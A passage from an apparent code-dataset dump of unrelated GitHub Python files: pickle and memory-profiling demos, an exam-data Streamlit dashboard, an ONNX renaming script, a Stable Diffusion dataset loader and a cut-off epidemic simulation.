second_detect_region_dilation,\n                                                   second_detect_region_low_threshold,\n                                                   second_detect_region_high_threshold))\n\n\ndef main():\n    recipe_name = input(\"please input recipe name: \")\n    recipe_parameter = pandas.read_csv(\"{}/parameter.csv\".format(recipe_name), index_col = 0)\n    for ip in ip_list:\n        process = Process(target = job, args=(ip, recipe_name, recipe_parameter.loc[ip, \"detect_region_dilation\"], \n                                              recipe_parameter.loc[ip, \"detect_region_low_threshold\"], \n                                              recipe_parameter.loc[ip, \"detect_region_high_threshold\"],\n                                              recipe_parameter.loc[ip, \"complete_region_dilation\"],\n                                              recipe_parameter.loc[ip, \"complete_region_low_threshold\"],\n                                              recipe_parameter.loc[ip, \"complete_region_high_threshold\"],\n                                              recipe_parameter.loc[ip, \"complete_ratio\"],\n                                              recipe_parameter.loc[ip, \"second_detect_region_dilation\"],\n                                              recipe_parameter.loc[ip, \"second_detect_region_low_threshold\"],\n                                              recipe_parameter.loc[ip, \"second_detect_region_high_threshold\"]))\n        process.start()\n    \nif __name__ == \"__main__\":\n    main()","repo_name":"jerrywang8472/code_backup","sub_path":"cut_image/detect_region_main.py","file_name":"detect_region_main.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12164826876","text":"\nimport pickle\n\n# a = (1,2,3)\n# ==============\n# print(a) # (1, 2, 3)\n# b = pickle.dumps(a)\n# print(b) #b'\\x80\\x04\\x95\\t\\x00\\x00\\x00\\x00\\x00\\x00\\x00K\\x01K\\x02K\\x03\\x87\\x94.'\n# c = pickle.loads(b)\n# print(a == c) # True\n# print(type(c)) # <class 'tuple'>\n# print(c) # (1, 2, 3)\n# =============================\n# a = (1,2,3)\n# with open(\"text.bin\", \"wb\") as file:\n#     pickle.dump(a, file)\n# with open(\"text.bin\", \"rb\") as file:\n#     b = pickle.load(file)\n# print(b)\n\n# =====================\n\nclass Character:\n    def __init__(self, name):\n        self.name = name\n\nchar = Character(\"Jack\")\n# ser = pickle.dumps(char)\n# print(ser)\n# des = pickle.loads(ser)\n# print(des) # <__main__.Character object at 0x7f7bb3f23090>\n# print(des.name) # Jack\n# print(type(des)) # <class '__main__.Character'>\n\nwith open(\"text.bin\", \"wb\") as file:\n    pickle.dump(char, file)","repo_name":"SiracencoSerghei/my-python-tasks","sub_path":"Serializing Python Objects/with_pickle_2.py","file_name":"with_pickle_2.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17167828868","text":"import streamlit as st\nimport pandas as pd\nimport plotly.express as px\n\nst.set_page_config(page_title=\"Fase 4 Lab 2 JECR\", layout=\"wide\")\n\n#### FUNCIONES ###\n@st.cache()\ndef plot_heatmap(df: pd.DataFrame, x: str, y: str):\n    data_heatmap = (\n        df.reset_index()[[x, y, \"index\"]]\n        .groupby([x, y])\n        .count()\n        .reset_index()\n        .pivot(x, y, \"index\")\n        .fillna(0)\n    )\n    fig = px.imshow(\n        data_heatmap,\n        color_continuous_scale=\"Blues\",\n        aspect=\"auto\",\n
        title=f\"Heatmap {x} vs {y}\",\n    )\n    fig.update_traces(\n        hovertemplate=\"<br>\"\n        + y\n        + \": %{x}<br>\"\n        + x\n        + \": %{y}<br>
        Conteo interacción variables: %{z}\"\n )\n return fig\n\n\n@st.cache()\ndef cargar_datos():\n data20201 = pd.read_csv(\"Resultados__nicos_Saber_11_plain_20201.csv\")\n data20211 = pd.read_csv(\"Resultados__nicos_Saber_11_plain_20211.csv\")\n # Se concatenan los dos periodos de los datos\n data = pd.concat([data20201, data20211])\n\n data[\"PUNT_GLOBAL_CAT\"] = data[\"PUNT_GLOBAL\"].apply(\n lambda x: \"BAJO (<=294)\" if x <= 294 else \"ALTO (>294)\"\n )\n # Se presentan los datos seleccionados\n return data\n\n\ndata = cargar_datos()\n\nst.sidebar.markdown(\"# Dashboard de exploración\")\n\nst.sidebar.image(\"logo.jpg\", use_column_width=True)\nst.sidebar.markdown(\n \"## Fase 4 Entrega Laboratorio 2 de Jorge Esteban Caballero Rodríguez\"\n)\n\nst.sidebar.markdown(\n \"### Datos ICFES periodos 20201 y 20211, obtenidos de \"\n \"[https://www.datos.gov.co/Educaci-n/Resultados-nicos-Saber-11/kgxf-xxbe/data](https://www.datos.gov.co/Educaci-n/Resultados-nicos-Saber-11/kgxf-xxbe/data)\"\n)\nst.sidebar.markdown(\n \"\"\"A su derecha, tendrá una serie de gráficos con sus controladores\nen la parte superior de los mismos.\n\nSe han elegido 3 gráficos para explorar los datos:\n\n- Un scatterplot, para comparar los puntajes entre si.\n- Un countplot, para ver la distribución de los niveles de las variables categóricas.\n - Este gráfico además, separa cada nivel según su nivel de desempeño. \n- Un heatmap, para comparar las variables del modelo con la clasificación hecha del puntaje.\n - Este se usó en el proyecto para la interpretación del modelo de Clasificación.\n\n\nDados los resultados obtenidos en la exploración y modelado, un puntaje se considera bajo si es menor o igual \na 294 (de 500)\n\n\nEn cambio, los puntajes altos serán los superiores a 294\"\"\"\n)\n\ncol1, col2 = st.columns(2)\ncol1.markdown(\n \"\"\"## Scatterplot:\nComparación entre las variables asociadas al puntaje\"\"\"\n)\ncol2.markdown(\n \"\"\"## Countplot:\nComparación entre los conteos de las diferentes variables categóricas y el nivel de puntaje obtenido.\n\n \n **El nivel de puntaje es \"BAJO\" para puntajes de 294 o menos, ya alto para puntajes mayores a 294**\"\"\"\n)\nvariables_numericas = [\n \"PUNT_INGLES\",\n \"PUNT_MATEMATICAS\",\n \"PUNT_SOCIALES_CIUDADANAS\",\n \"PUNT_C_NATURALES\",\n \"PUNT_LECTURA_CRITICA\",\n \"PUNT_GLOBAL\",\n]\nscatterx = col1.selectbox(\n label=\"Elija una de las variables numéricas para el eje X del Scatterplot\",\n options=variables_numericas,\n)\nopciones_scatter2 = variables_numericas.copy()\nopciones_scatter2.pop(variables_numericas.index(scatterx))\nscattery = col1.selectbox(\n label=\"Elija una de las variables numéricas para el eje Y del Scatterplot\",\n options=opciones_scatter2,\n)\n\n\nfig = px.scatter(\n data,\n x=scatterx,\n y=scattery,\n)\nfig.update_traces(\n marker=dict(size=7, line=dict(width=2, color=\"DarkSlateGrey\")),\n selector=dict(mode=\"markers\"),\n opacity=0.69,\n)\ncol1.plotly_chart(fig, use_container_width=True)\n\n\nhistx = col2.selectbox(\n label=\"Elije la variable categórica para observar su conteo y distribución entre puntajes ALTO y BAJO\",\n options=[\n \"COLE_BILINGUE\",\n \"COLE_AREA_UBICACION\",\n \"COLE_CALENDARIO\",\n \"COLE_CARACTER\",\n \"COLE_GENERO\",\n \"COLE_JORNADA\",\n \"COLE_NATURALEZA\",\n \"COLE_DEPTO_UBICACION\",\n \"ESTU_GENERO\",\n \"FAMI_CUARTOSHOGAR\",\n \"FAMI_EDUCACIONMADRE\",\n \"FAMI_EDUCACIONPADRE\",\n \"FAMI_ESTRATOVIVIENDA\",\n \"FAMI_PERSONASHOGAR\",\n \"FAMI_TIENEAUTOMOVIL\",\n \"FAMI_TIENECOMPUTADOR\",\n 
\"FAMI_TIENEINTERNET\",\n        \"FAMI_TIENELAVADORA\",\n    ],\n)\n\n\ndef plot_histogram(data, x):\n    df = data.copy()\n    df = df.sort_values(by=x, ascending=False)\n\n    fig = px.histogram(df, x=x, color=\"PUNT_GLOBAL_CAT\")\n    return fig\n\n\nfig2 = plot_histogram(data, histx)\ncol2.plotly_chart(fig2, use_container_width=True)\n\nst.markdown(\n    \"\"\"## Heatmap de PUNT_GLOBAL_CAT (clasificación del puntaje global) vs Otras variables categóricas. \n\nLas variables categóricas habilitadas son aquellas que llegaron al modelo final.\n\n\"\"\"\n)\nheatmap_opcion = st.selectbox(\n    label=\"Elige la opción de la variable a comparar con la clasificación del puntaje global\",\n    options=[\n        \"COLE_BILINGUE\",\n        \"COLE_CALENDARIO\",\n        \"COLE_JORNADA\",\n        \"FAMI_EDUCACIONPADRE\",\n        \"FAMI_TIENEAUTOMOVIL\",\n    ],\n)\n\nst.plotly_chart(\n    plot_heatmap(data, \"PUNT_GLOBAL_CAT\", heatmap_opcion), use_container_width=True\n)\n","repo_name":"JECaballeroR/MIADJECRLAB2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"123550332","text":"\r\nprint(\"Please use a ? for the unknown value\")\r\nSpeed=input(\"What is the speed?\")\r\ntime=input(\"What is the time?\")\r\nDistance=input(\"What is the distance?\")\r\nif (Speed=='?' and Distance=='?') or (Speed=='?' and time =='?') or (time=='?' and Distance=='?'):\r\n    print(\"There are too many variables\")\r\nelif Speed =='?':\r\n    Speed= int(Distance)/int(time)\r\n    print(\"The speed is\", Speed)\r\nelif time =='?':\r\n    time= int(Distance)/int(Speed)\r\n    print(\"The time is\",time)\r\nelif Distance =='?':\r\n    Distance= int(Speed)*int(time)\r\n    print(\"The Distance is\",Distance)\r\nelse:\r\n    print(\"You have all the answers\")\r\n","repo_name":"grevutiu-gabriel/PythonPrograms","sub_path":"Distance from time and speed.py","file_name":"Distance from time and speed.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35827643261","text":"__author__ = \"jeffrey\"\n__date__ = \"$2015/7/21 上午 11:59:06$\"\n\nimport hashlib\nimport os\n\nclass MyObject(object):\n    def __init__(self):\n        self.x = os.urandom(20000)\n        self.y = hashlib.sha1(self.x).hexdigest()\n\ndef get_data():\n    values = []\n    for _ in range(50):\n        obj = MyObject()\n        values.append(obj)\n    return values\n\ndef run():\n    deep_values = []\n    for _ in range(50):\n        deep_values.append(get_data())\n    return deep_values\n\nif __name__ == \"__main__\":\n    import gc\n    found_objects = gc.get_objects()\n    print('%d objects before' % len(found_objects))\n\n\n    x = run()\n    found_objects = gc.get_objects()\n    print('%d objects after' % len(found_objects))\n    for obj in found_objects[:3]:\n        print(repr(obj)[:100])\n    \n    import tracemalloc\n    tracemalloc.start(10) # Save up to 10 stack frames\n\n    time1 = tracemalloc.take_snapshot()\n    x = run()\n    time2 = tracemalloc.take_snapshot()\n    stats = time2.compare_to(time1, 'lineno')\n    \n    for stat in stats:\n        print(stat)\n    \n    stats = time2.compare_to(time1, 'traceback')\n    top = stats[0]\n    print('\\n'.join(top.traceback.format()))","repo_name":"jeffreybaoshenlee/PythonArena","sub_path":"src/nerdlab/try_memory.py","file_name":"try_memory.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"36535290803","text":"\"\"\"\nhttps://towardsdatascience.com/creating-editing-and-merging-onnx-pipelines-897e55e98bb0\nhttps://github.com/scailable/sclblonnx/blob/master/examples/example_05.py\n\"\"\"\n\n\nimport sclblonnx as so\n\nonnx_file = \"/home/lina/Desktop/TRITON/model_repository/yolov3/1/model.onnx\"\n\n# Open the graph. \ng = so.graph_from_file(onnx_file)\n\n# rename onnx input and output\ng = so.rename_input(g, \"input.1\", \"input\")\n\ng = so.rename_output(g, \"662\", \"output_13\")\ng = so.rename_output(g, \"715\", \"output_26\")\ng = so.rename_output(g, \"768\", \"output_52\")\n\n\ng = so.rename_output(g, \"769\", \"detections\")\n\n\n\nso.graph_to_file(g, onnx_file+\".out\")\n","repo_name":"151ali/triton-inference-server-examples","sub_path":"rename_onnx.py","file_name":"rename_onnx.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23280789239","text":"\n\nimport random\nimport torch\n\n\n\nfrom torch.utils.data import Dataset\n\nimport PIL\n\nfrom PIL import Image\n\nimport itertools\nimport math\nimport os\nimport random\nfrom pathlib import Path\n\nfrom torchvision import transforms\n\nimport json \n\n\n\n\n# dreambooth:\n # single prompt: photo of xyz house\n # pick random from list of predefined prompts\n # image caption pairs\n # train multiple concepts jointly\n\n# textual inversion\n # pick random from list of predefined prompts\n # image caption pairs\n # train multiple concepts jointly\n\n# finetuning:\n # image caption pairs\n\n\n\n# dreambooth collate_fn output\n # batch = {\n # \"input_ids\": input_ids,\n # \"pixel_values\": pixel_values,\n # }\n # batch = {\n # \"input_ids\": input_ids,\n # \"pixel_values\": pixel_values,\n # }\n\n\n\n\n# precedence:\n# concept_list keys:\n # instance_prompt\n # instance_data_dir\n\n\n # class_prompt\n # class_data_dir\n\n\n # promptsfile each line: {\"file_name\": \"0001.png\", \"text\": \"This is a golden retriever playing with a ball\"}\n # metadata each line: {\"file_name\": \"0001.png\", \"text\": \"This is a golden retriever playing with a ball\"}\n\n\n\n# if promtsfile is None, use instance_prompt\n# if promtsfile and instance_prompt is None, use ramdom prompt from templates\n# if token is set, must be contained in instance_prompt, if instance_prompt is not set, should be contained in promptsfile (maybe if not in all, it has regularization effect)\n# for normal finetuning, only set promptsfile and instance_data_dir, everything else set to None\nconcepts_list = [\n {\n \"token\" : None, #instance_prompt must contain token (if both set), if not set, instance_prompt can contain eg rare tokens like xyz, worth trying if some prompts in promptsfile do not contain the token if it helps for preserving prior and regularization\n \"initializer_token\" : None, # only needed when adding \"token\" to embedding\n \"promptsfile\" : None, # precedence 1\n \"instance_prompt\": None, # precedence 2\n \"class_prompt\": None,\n \"instance_data_dir\":None,\n \"class_data_dir\": None,\n \"type\" : None, # one of ['style', 'object']; must be set if promptsfile and instance_prompt are not set\n \n }\n ]\n\nimagenet_templates_small = [\n \"a photo of a {}\",\n \"a rendering of a {}\",\n \"a cropped photo of the {}\",\n \"the photo of a {}\",\n \"a photo of a clean {}\",\n \"a photo of a dirty {}\",\n \"a dark photo of the {}\",\n \"a photo of my {}\",\n \"a photo of the cool {}\",\n \"a close-up photo of a {}\",\n \"a bright photo 
of the {}\",\n \"a cropped photo of a {}\",\n \"a photo of the {}\",\n \"a good photo of the {}\",\n \"a photo of one {}\",\n \"a close-up photo of the {}\",\n \"a rendition of the {}\",\n \"a photo of the clean {}\",\n \"a rendition of a {}\",\n \"a photo of a nice {}\",\n \"a good photo of a {}\",\n \"a photo of the nice {}\",\n \"a photo of the small {}\",\n \"a photo of the weird {}\",\n \"a photo of the large {}\",\n \"a photo of a cool {}\",\n \"a photo of a small {}\",\n]\nimagenet_style_templates_small = [\n \"a photo in the style of {}\",\n \"a rendering in the style of {}\",\n \"a cropped photo in the style of {}\",\n \"the photo in the style of {}\",\n \"a clean photo in the style of {}\",\n \"a dirty photo in the style of {}\",\n \"a dark photo in the style of {}\",\n \"a picture in the style of {}\",\n \"a cool photo in the style of {}\",\n \"a close-up photo in the style of {}\",\n \"a bright photo in the style of {}\",\n \"a cropped photo in the style of {}\",\n \"a good photo in the style of {}\",\n \"a close-up photo in the style of {}\",\n \"a rendition in the style of {}\",\n \"a nice photo in the style of {}\",\n \"a small picture in the style of {}\",\n \"a weird picture in the style of {}\",\n \"a large picture in the style of {}\",\n]\n\n\ndef get_promptsfile(file_path):\n try:\n with open(file_path, \"r\") as f:\n data = [json.loads(line) for line in f]\n except Exception as e:\n print(e)\n data = []\n return data\n\n# entry = {\"file_name\": filename, \"text\": prompt},\n\n# imagenet_style_templates_small = [\n# \"a painting in the style of {}\",\n# \"a rendering in the style of {}\",\n# \"a cropped painting in the style of {}\",\n# \"the painting in the style of {}\",\n# \"a clean painting in the style of {}\",\n# \"a dirty painting in the style of {}\",\n# \"a dark painting in the style of {}\",\n# \"a picture in the style of {}\",\n# \"a cool painting in the style of {}\",\n# \"a close-up painting in the style of {}\",\n# \"a bright painting in the style of {}\",\n# \"a cropped painting in the style of {}\",\n# \"a good painting in the style of {}\",\n# \"a close-up painting in the style of {}\",\n# \"a rendition in the style of {}\",\n# \"a nice painting in the style of {}\",\n# \"a small painting in the style of {}\",\n# \"a weird painting in the style of {}\",\n# \"a large painting in the style of {}\",\n# ]\n\n\nclass StableDiffusionDataset(Dataset):\n \"\"\"\n A dataset to prepare the instance and class images with the prompts for fine-tuning the model.\n It pre-processes the images and the tokenizes prompts.\n \"\"\"\n\n def __init__(\n self,\n concepts_list,\n tokenizer,\n with_prior_preservation=True,\n size=512,\n center_crop=False,\n num_class_images=None,\n pad_tokens=False,\n hflip=False,\n vector_shuffle=False\n ):\n self.size = size\n self.center_crop = center_crop\n self.tokenizer = tokenizer\n self.with_prior_preservation = with_prior_preservation\n self.pad_tokens = pad_tokens\n\n self.vector_shuffle = vector_shuffle\n\n self.instance_images_path = []\n self.class_images_path = []\n self.num_class_images = num_class_images\n\n if isinstance(concepts_list, str):\n try:\n with open(concepts_list, \"r\") as f:\n concepts_list = json.load(f)\n except Exception as e:\n raise ValueError(f\"concept_list is a string and cannot be opened. 
if concept_list is a string, there must exist a file with this filepath.\")\n \n \n\n for concept in concepts_list:\n # if promtsfile is set, use promtsfile\n # if promtsfile is None, use instance_prompt\n # if promtsfile and instance_prompt are None, use ramdom prompt from templates\n\n if concept.get(\"promptsfile\") is not None:\n promptsfile = get_promptsfile(concept[\"promptsfile\"])\n inst_img_path = [(concept[\"instance_data_dir\"].rstrip('/') + '/' +x['file_name'], x['text']) for x in promptsfile if os.path.exists(concept[\"instance_data_dir\"].rstrip('/') + '/' +x['file_name'])]\n self.instance_images_path.extend(inst_img_path)\n\n elif concept.get(\"instance_prompt\") is not None:\n if concept.get(\"token\"): \n assert concept[\"token\"] in concept[\"instance_prompt\"], 'if \"token\" and \"instance_prompt\" are set, \"instance_prompt\" must contain \"token\".'\n\n inst_img_path = [(x, concept[\"instance_prompt\"]) for x in Path(concept[\"instance_data_dir\"]).iterdir() if x.is_file()] # [('./abc.png', 'photo of xyz house'), ...]\n self.instance_images_path.extend(inst_img_path)\n\n else:\n if concept.get('type') is None:\n raise ValueError('if promptsfile and instance_prompt are not set in concept_list, \"type\" must be specified as one of [\"style\", \"object\"].')\n templates = imagenet_style_templates_small if concept['type'] == 'style' else imagenet_templates_small\n sample_prompt_from_template = lambda: random.choice(templates).format(concept[\"token\"])\n inst_img_path = [(x, sample_prompt_from_template()) for x in Path(concept[\"instance_data_dir\"]).iterdir() if x.is_file()]\n self.instance_images_path.extend(inst_img_path)\n\n if num_class_images and with_prior_preservation:\n\n class_data_dirs =[]\n for concept in concepts_list:\n if concept[\"class_data_dir\"] not in class_data_dirs:\n class_img_path = [(x, concept[\"class_prompt\"]) for x in Path(concept[\"class_data_dir\"]).iterdir() if x.is_file()] # [('./abc.png', 'photo of house'), ...]\n self.class_images_path.extend(class_img_path[:num_class_images])\n class_data_dirs.append(concept[\"class_data_dir\"])\n\n random.shuffle(self.instance_images_path)\n\n self.num_instance_images = len(self.instance_images_path)\n self._length = self.num_instance_images\n if num_class_images:\n self.num_class_images = len(self.class_images_path)\n self._length = max(self.num_class_images, self.num_instance_images)\n\n self.image_transforms = transforms.Compose(\n [\n transforms.RandomHorizontalFlip(0.5 * hflip),\n transforms.Resize(size, interpolation=transforms.InterpolationMode.BILINEAR),\n transforms.CenterCrop(size) if center_crop else transforms.RandomCrop(size),\n transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5]),\n ]\n )\n\n def __len__(self):\n return self._length\n\n def __getitem__(self, index):\n example = {}\n instance_path, instance_prompt = self.instance_images_path[index % self.num_instance_images]\n instance_image = Image.open(instance_path)\n if not instance_image.mode == \"RGB\":\n instance_image = instance_image.convert(\"RGB\")\n \n example[\"instance_images\"] = self.image_transforms(instance_image)\n example[\"instance_prompt_ids\"] = self.tokenizer(\n instance_prompt,\n padding=\"max_length\" if self.pad_tokens else \"do_not_pad\",\n truncation=True,\n max_length=self.tokenizer.model_max_length,\n vector_shuffle=self.vector_shuffle\n ).input_ids\n\n if self.num_class_images and self.with_prior_preservation:\n class_path, class_prompt = self.class_images_path[index % self.num_class_images]\n 
class_image = Image.open(class_path)\n if not class_image.mode == \"RGB\":\n class_image = class_image.convert(\"RGB\")\n example[\"class_images\"] = self.image_transforms(class_image)\n example[\"class_prompt_ids\"] = self.tokenizer(\n class_prompt,\n padding=\"max_length\" if self.pad_tokens else \"do_not_pad\",\n truncation=True,\n max_length=self.tokenizer.model_max_length,\n vector_shuffle=self.vector_shuffle\n ).input_ids\n\n return example\n\n\n\ndef collate_fn(examples, tokenizer):\n input_ids = [example[\"instance_prompt_ids\"] for example in examples]\n pixel_values = [example[\"instance_images\"] for example in examples]\n\n # Concat class and instance examples for prior preservation.\n # We do this to avoid doing two forward passes.\n if \"class_images\" in examples[0]: # with with_prior_preservation\n input_ids += [example[\"class_prompt_ids\"] for example in examples]\n pixel_values += [example[\"class_images\"] for example in examples]\n\n pixel_values = torch.stack(pixel_values)\n pixel_values = pixel_values.to(memory_format=torch.contiguous_format).float()\n\n padded_tokens = tokenizer.pad(\n {\"input_ids\": input_ids},\n padding=True,\n return_tensors=\"pt\",\n )\n\n batch = {\n \"pixel_values\": pixel_values,\n \"input_ids\": padded_tokens.input_ids,\n \"attention_mask\": padded_tokens.attention_mask,\n }\n return batch\n\n\n\n\n\n\n\nclass PromptDataset(Dataset):\n \"A simple dataset to prepare the prompts to generate class images on multiple GPUs.\"\n\n def __init__(self, prompt, num_samples):\n self.prompt = prompt\n self.num_samples = num_samples\n\n def __len__(self):\n return self.num_samples\n\n def __getitem__(self, index):\n example = {}\n example[\"prompt\"] = self.prompt\n example[\"index\"] = index\n return example\n\n\nclass LatentsDataset(Dataset):\n def __init__(self, latents_cache, text_encoder_cache):\n self.latents_cache = latents_cache\n self.text_encoder_cache = text_encoder_cache\n\n def __len__(self):\n return len(self.latents_cache)\n\n def __getitem__(self, index):\n return self.latents_cache[index], self.text_encoder_cache[index]\n\n\n\nclass AverageMeter:\n def __init__(self, name=None):\n self.name = name\n self.reset()\n\n def reset(self):\n self.sum = self.count = self.avg = 0\n\n def update(self, val, n=1):\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count","repo_name":"pkurzend/stable-diffusion-scripts","sub_path":"stableDiffusionDataset.py","file_name":"stableDiffusionDataset.py","file_ext":"py","file_size_in_byte":13021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"12156022619","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pygame as pg\nimport time as tm\n\n# constant definition\nCOUNTRY_LENGTH = 1000\nCOUNTRY_WIDTH = 1000\nHUMAN_RADIUS = 0.01\nQUA_RADIUS = 0.05\nEFFECTIVE_DIST = 0.1\n\n# debug\nERR_INIT_COUNTRY = \"Failed to initialise country\"\nERR_INIT_PERSON = \"Failed to initialise person\"\n\n# helper functions\ndef dist(position1, position2):\n\tdist = np.sqrt((position1[0]-position2[0])**2 + (position1[1]-position2[1])**2)\n\treturn dist\n\ndef x_y_outside(pos, wall):\n\t'''\n\tinput: pos:2d np.vector\n\twall: 4 tuple contains for the corner of the wall\n\tin the order of xmin, xmax, ymin, ymax\n\t'''\n\t(xmin,xmax,ymin,ymax) = wall\n\tx_outside = False\n\ty_outside = False\n\tif pos[0] < xmin or pos[0] > xmax:\n\t\tx_outside = True\n\tif pos[1] < ymin or pos[1] > ymax:\n\t\ty_outside = True\n\n\treturn 
(x_outside,y_outside)\n\ndef locate(pos, area1, area2, area3, area4):\n\tif not x_y_outside(pos,area1)[0] and not x_y_outside(pos,area1)[1]:\n\t\treturn area1\n\tif not x_y_outside(pos,area2)[0] and not x_y_outside(pos,area2)[1]:\n\t\treturn area2\n\tif not x_y_outside(pos,area3)[0] and not x_y_outside(pos,area3)[1]:\n\t\treturn area3\n\tif not x_y_outside(pos,area4)[0] and not x_y_outside(pos,area4)[1]:\n\t\treturn area4\n\nclass country:\n\n\t'''\n\tinput: name: string, restrictions: dictionary of keys\n\tbeing different restrictions and values being booleans, population: int\n\tenforement_rate: float between 0 and 1\n\tlocation: 4-tuple indicating its position on the map consists of xMin, xMax, yMin, yMax\n\t'''\n\n\tdef __init__(self, name, restrictions, population, enforement_rate, location=(-0.8,0.8,-0.8,0.8)):\n\n\t\tself.name = name\n\t\tself.restrictions = restrictions\n\t\tself.enforement_rate = enforement_rate\n\t\tself.population = population\n\n\t\t# location\n\t\tself.location = location\n\t\tcentre = [(self.location[0]+self.location[1])/2, \\\n\t\t\t\t\t\t(self.location[2]+self.location[3])/2]\n\t\tself.area1 = [self.location[0],centre[0],self.location[2],centre[1]]\n\t\tself.area2 = [centre[0],self.location[1],self.location[2],centre[1]]\n\t\tself.area3 = [self.location[0],centre[0],centre[1],self.location[3]]\n\t\tself.area4 = [centre[0],self.location[1],centre[1],self.location[3]]\n\n\t\tself.areas = [self.area1,self.area2,self.area3,self.area4]\n\n\t\t# randomly generate a bunch of people with certain size\n\t\tself.people = []\n\t\tself.create_people()\n\n\t\t# cases\n\t\tself.total = 0\n\t\tself.totals = []\n\t\tself.death = 0\n\t\tself.deaths = []\n\t\tself.daily = 0\n\t\tself.dailies = []\n\n\t\tfor person in self.people:\n\t\t\tif person.is_sick:\n\t\t\t\tself.total += 1\n\n\t\t# time\n\t\tself.day_count = 0\n\n\t\t# visualisation\n\t\tself.visualisation = AreaVisualisation(location)\n\n\tdef create_people(self):\n\t\tfor i in range(self.population):\n\t\t\tif random.random() > self.enforement_rate:\n\t\t\t\tis_legal = False\n\t\t\telse:\n\t\t\t\tis_legal = True\n\t\t\tposition = np.array([random.uniform\\\n\t\t\t(self.location[0],self.location[1]),\\\n\t\t\t random.uniform(self.location[2],self.location[3])])\n\t\t\tif i == 0:\n\t\t\t\tself.people.append \\\n\t\t\t\t(person(position, is_legal=is_legal, is_sick=True))\n\t\t\tself.people.append(person(position, is_legal=is_legal))\n\n\tdef cal_infect_rate(self, person):\n\n\t\t'''if there are sick people within dist<(), it is possible\n\t\tto get sick with base rate of (0.2), its square grows propotional to\n\t\tthe distance of the sick people'''\n\n\t\tbase_rate = 0.1\n\t\t# might not be factually accurate but doesn't matter in this case\n\n\t\tpb_infect = 0\n\t\tlocation1 = locate(person.position,self.area1,self.area2,self.area3,self.area4)\n\t\tfor person2 in self.people:\n\t\t\tif not person2.is_sick or not person2.is_alive: # also counts for the case when it's the same as person\n\t\t\t\tcontinue\n\t\t\tif locate(person2.position,self.area1,self.area2,self.area3,self.area4) \\\n\t\t\t\t!= location1:\n\t\t\t\tcontinue\n\t\t\tdis = dist(person.position,person2.position)\n\t\t\tif not dis < EFFECTIVE_DIST:\n\t\t\t\tcontinue\n\n\t\t\tif 0 == pb_infect:\n\t\t\t\tpb_infect = base_rate/(100*dis**2)\n\t\t\telse:\n\t\t\t\t# the rate of getting sick is equal to\n\t\t\t\t# 1 - the probability of not getting sick\n\t\t\t\tpb_infect = 1 - (1 - pb_infect)*(1-(base_rate/dis**2))\n\t\t\t\tif pb_infect > 1:\n\t\t\t\t\treturn 
1\n\n\t\treturn pb_infect\n\n\tdef infect_people(self):\n\t\tfor person in self.people:\n\t\t\tif person.is_immune or person.is_sick:\n\t\t\t\tcontinue\n\n\t\t\tinfect_rate = self.cal_infect_rate(person)\n\t\t\tif random.random() < infect_rate:\n\t\t\t\tperson.is_sick = True\n\t\t\t\tself.total += 1\n\t\t\t\tself.daily += 1\n\t\t\t\tif random.random() > 0.05:\n\t\t\t\t\tperson.is_symptomatic = True\n\t\treturn\n\n\n\tdef detect_collision(self, person, delta):\n\t\t# hits people\n\t\tif not person.is_quarantined:\n\t\t\tfor person2 in self.people:\n\t\t\t\tif not person2.is_alive:\n\t\t\t\t\tcontinue\n\t\t\t\tif person2 != person and \\\n\t\t\t\tdist(person.position, person2.position) <= \\\n\t\t\t\t1.2*(person.radius+person2.radius):\n\t\t\t\t\t\tperson.update_velocity(person2)\n\n\t\t\t# hits wall\n\n\t\t\tnext_pos = person.position + person.velocity*delta\n\n\t\t\t# area_restrictions\n\t\t\tif self.restrictions['area_restrictions']:\n\t\t\t\tif random.random() < self.enforement_rate:\n\t\t\t\t\tarea_wall = locate(person.position,self.area1,self.area2,self.area3,self.area4)\n\t\t\t\t\tx_out,y_out = x_y_outside(next_pos, area_wall)\n\t\t\t\telse:\n\t\t\t\t\tx_out,y_out = x_y_outside(next_pos, self.location)\n\t\t\telse:\n\t\t\t\tx_out,y_out = x_y_outside(next_pos, self.location)\n\n\t\t\tif x_out:\n\t\t\t\tperson.velocity = np.array([-person.velocity[0],person.velocity[1]])\n\t\t\tif y_out:\n\t\t\t\tperson.velocity = np.array([person.velocity[0],-person.velocity[1]])\n\n\t\treturn\n\n\tdef apply_restrictions(self):\n\n\t\tif self.restrictions['quarantine']:\n\t\t\tfor person in self.people:\n\t\t\t\tif person.is_legal:\n\t\t\t\t\tif person.is_quarantined and not person.is_sick:\n\t\t\t\t\t\tperson.is_quarantined = False\n\t\t\t\t\t\tperson.radius = HUMAN_RADIUS\n\n\t\t\t\t\tif person.is_symptomatic:\n\t\t\t\t\t\tperson.is_quarantined = True\n\t\t\t\t\t\t# person.radius = QUA_RADIUS\n\n\t\tif self.restrictions['reduce_travelling']:\n\t\t\tself.restrictions['reduce_travelling'] = False\n\t\t\tfor person in self.people:\n\t\t\t\tif person.is_legal:\n\t\t\t\t\tperson.velocity *= 0.2\n\n\t\tif self.restrictions['area_restrictions']:\n\t\t\tfor area in self.areas:\n\t\t\t\tAreaVisualisation(area).Draw()\n \n\n\tdef update_people(self, delta):\n\t\tself.apply_restrictions()\n\t\tfor person in self.people:\n\t\t\tif person.is_alive:\n\t\t\t\tself.detect_collision(person, delta)\n\t\t\tdeath_count, recorver_count = person.update(delta)\n\t\t\tself.death += death_count\n\t\t\tself.total -= (death_count+recorver_count)\n\n\tdef update_data(self):\n\t\tcount = 1\n \n\t\tif not count // 5:\n\t\t\tself.day_count += 